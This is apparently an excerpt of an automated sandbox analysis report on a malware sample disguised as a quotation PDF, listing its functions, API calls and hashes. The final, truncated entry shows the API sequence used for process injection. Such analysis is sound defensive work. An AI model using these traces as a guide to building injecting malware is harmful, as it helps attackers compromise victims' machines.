                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                                                    • String ID:
                                                                    • API String ID: 1794320848-0
                                                                    • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                    • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                                                    • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                    • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                                                    Function 00475300 Relevance: 4.6, APIs: 3, Instructions: 141COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                                                    • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CurrentTerminate
                                                                    • String ID:
                                                                    • API String ID: 2429186680-0
                                                                    • Opcode ID: 0f578ce52da9f9b4c714c296b9d78fbd636f242c945bc8d5a468c0e4c8bdb3ba
                                                                    • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                                                                    • Opcode Fuzzy Hash: 0f578ce52da9f9b4c714c296b9d78fbd636f242c945bc8d5a468c0e4c8bdb3ba
                                                                    • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                                                                    Function 0040E0C0 Relevance: 4.6, APIs: 3, Instructions: 82windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: IconNotifyShell_
                                                                    • String ID:
                                                                    • API String ID: 1144537725-0
                                                                    • Opcode ID: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                                    • Instruction ID: eb3a406907b17a2fb372061a5351d340f380801689ea858bebf243c914dbfa85
                                                                    • Opcode Fuzzy Hash: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                                    • Instruction Fuzzy Hash: 16318F70608701DFD320CF25D855797BBE4BB85314F000C3EE5AA87391E7B8A958CB5A
                                                                    Function 00403AF0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 53COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                                                      • Part of subcall function 00403B70: _memmove.LIBCMT ref: 00403BA7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$_malloc_memmove
                                                                    • String ID: \5@
                                                                    • API String ID: 961785871-1309314528
                                                                    • Opcode ID: 593b96bae4507f388c2b45a63525b102ab9916beddf5c8fa7589e437835f9edd
                                                                    • Instruction ID: cad64edcdcba5d9ec8cd2b6a335bbe98b4fe19d5968b0e5b1ca7a0aa7405deab
                                                                    • Opcode Fuzzy Hash: 593b96bae4507f388c2b45a63525b102ab9916beddf5c8fa7589e437835f9edd
                                                                    • Instruction Fuzzy Hash: 7801D6713402007FE714AB669C86F6B7B9CDB85725F14403ABA09DB2D1D9B1ED008365
                                                                    Function 0043213D Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _malloc.LIBCMT ref: 0043214B
                                                                      • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                      • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                      • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                    • _malloc.LIBCMT ref: 0043215D
                                                                    • _malloc.LIBCMT ref: 0043216F
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _malloc$AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 680241177-0
                                                                    • Opcode ID: f71c381a9a4e64bea8472010c286ed0a2169748a03ca4327bb91778eef0474c7
                                                                    • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                                                    • Opcode Fuzzy Hash: f71c381a9a4e64bea8472010c286ed0a2169748a03ca4327bb91778eef0474c7
                                                                    • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                                                    Function 00409519 Relevance: 4.5, APIs: 3, Instructions: 31windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • TranslateMessage.USER32(?), ref: 00409556
                                                                    • DispatchMessageW.USER32(?), ref: 00409561
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Message$DispatchPeekTranslate
                                                                    • String ID:
                                                                    • API String ID: 4217535847-0
                                                                    • Opcode ID: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                                                    • Instruction ID: 9fbe2eaaa5ffb99098057fa667d4f29c0aa55754a5137076743fac66577e99fa
                                                                    • Opcode Fuzzy Hash: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                                                    • Instruction Fuzzy Hash: D8F05431554300AAE624D7A18D41F9B76A89F98784F40482EB641962E1EB78D444CB5A
                                                                    Function 00431DDB Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000), ref: 00431DF5
                                                                    • SetFileTime.KERNELBASE(00000000,?,00000000,?), ref: 00431E0D
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00431E14
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandleTime
                                                                    • String ID:
                                                                    • API String ID: 3397143404-0
                                                                    • Opcode ID: 652760460537c60afb823e5992d28b38c9a9f9fa5742e3fc7e82df653fee10b1
                                                                    • Instruction ID: 810a19753c0f2c4684b0bfc273ce87ce290b2c8a2af4acb4f2079771c7d617b3
                                                                    • Opcode Fuzzy Hash: 652760460537c60afb823e5992d28b38c9a9f9fa5742e3fc7e82df653fee10b1
                                                                    • Instruction Fuzzy Hash: 50E01275240214BBE6205B54DC4EF9F7758AB49B20F108615FF156B1D0C6B4695187A8
                                                                    Function 004320F8 Relevance: 4.5, APIs: 3, Instructions: 25COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _free.LIBCMT ref: 0043210A
                                                                      • Part of subcall function 00413748: RtlFreeHeap.NTDLL(00000000,00000000,?,00417A5A,00000000), ref: 0041375E
                                                                      • Part of subcall function 00413748: GetLastError.KERNEL32(00000000,?,00417A5A,00000000), ref: 00413770
                                                                    • _free.LIBCMT ref: 0043211D
                                                                    • _free.LIBCMT ref: 00432130
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 471d261c1978e8fd492efb66726f25644d258391566ce7e49abf025be84b45d1
                                                                    • Instruction ID: d08fe22c6a524c27e4c6c7bcf1019f14b9a5eff3fc739cf1d41fcb720108e0a5
                                                                    • Opcode Fuzzy Hash: 471d261c1978e8fd492efb66726f25644d258391566ce7e49abf025be84b45d1
                                                                    • Instruction Fuzzy Hash: 29E092F290071433CD1099219941A87F38C4B15B11F08402AFA15A3301E969FA40C1E9
                                                                    Function 00467897 Relevance: 3.2, APIs: 2, Instructions: 170COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __wsplitpath.LIBCMT ref: 004678F7
                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                    • GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast__wsplitpath_malloc
                                                                    • String ID:
                                                                    • API String ID: 4163294574-0
                                                                    • Opcode ID: 852a3ca7f2627077b5b9f314f6d57bf7801f83530216794b81ea25db2d4422c1
                                                                    • Instruction ID: 5ded281afda408fdcd401bf2365ceabb828b89a129c607e264fb1023d06c7d2e
                                                                    • Opcode Fuzzy Hash: 852a3ca7f2627077b5b9f314f6d57bf7801f83530216794b81ea25db2d4422c1
                                                                    • Instruction Fuzzy Hash: FB5126712083018BD710EF75C881A5BB3E5AF84318F044A6EF9559B381EB39ED09CB97
                                                                    Function 0040F760 Relevance: 3.1, APIs: 2, Instructions: 92COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                                                      • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                                                      • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                                                                    • _strcat.LIBCMT ref: 0040F786
                                                                      • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                                                      • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                                                    • String ID:
                                                                    • API String ID: 3199840319-0
                                                                    • Opcode ID: 184cd8420872ce2487ddf7aadb861007254b50f98d2a6d2ea2427860c6a86edc
                                                                    • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                                                                    • Opcode Fuzzy Hash: 184cd8420872ce2487ddf7aadb861007254b50f98d2a6d2ea2427860c6a86edc
                                                                    • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                                                                    Function 0040D6B0 Relevance: 3.1, APIs: 2, Instructions: 74COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                                                                    • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: FreeInfoLibraryParametersSystem
                                                                    • String ID:
                                                                    • API String ID: 3403648963-0
                                                                    • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                    • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                                                    • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                    • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                                                    Function 0040F110 Relevance: 3.1, APIs: 2, Instructions: 51fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
                                                                    • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    • Opcode ID: 51790c55969d4720e5bc0ceda432f1a204703ad37dc0e1a649077e2838033e58
                                                                    • Instruction ID: 8a88c5525f76e0b0fff62cf48ad84dc7055e673dbb4ccc29545257d8619b8f55
                                                                    • Opcode Fuzzy Hash: 51790c55969d4720e5bc0ceda432f1a204703ad37dc0e1a649077e2838033e58
                                                                    • Instruction Fuzzy Hash: 16011D70784310BAF2305A68DD0BF5266546B45B24F20473ABBE5BE2D1D2F86885870C
                                                                    Function 00414A46 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                    • __lock_file.LIBCMT ref: 00414A8D
                                                                      • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                                                    • __fclose_nolock.LIBCMT ref: 00414A98
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                    • String ID:
                                                                    • API String ID: 2800547568-0
                                                                    • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                    • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                                                                    • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                    • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                                                                    Function 00414FE2 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __lock_file.LIBCMT ref: 00415012
                                                                    • __ftell_nolock.LIBCMT ref: 0041501F
                                                                      • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                    • String ID:
                                                                    • API String ID: 2999321469-0
                                                                    • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                    • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                                                                    • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                    • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                                                                    Function 032612E5 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 03261AA3
                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03261B39
                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03261B5B
                                                                    Memory Dump Source
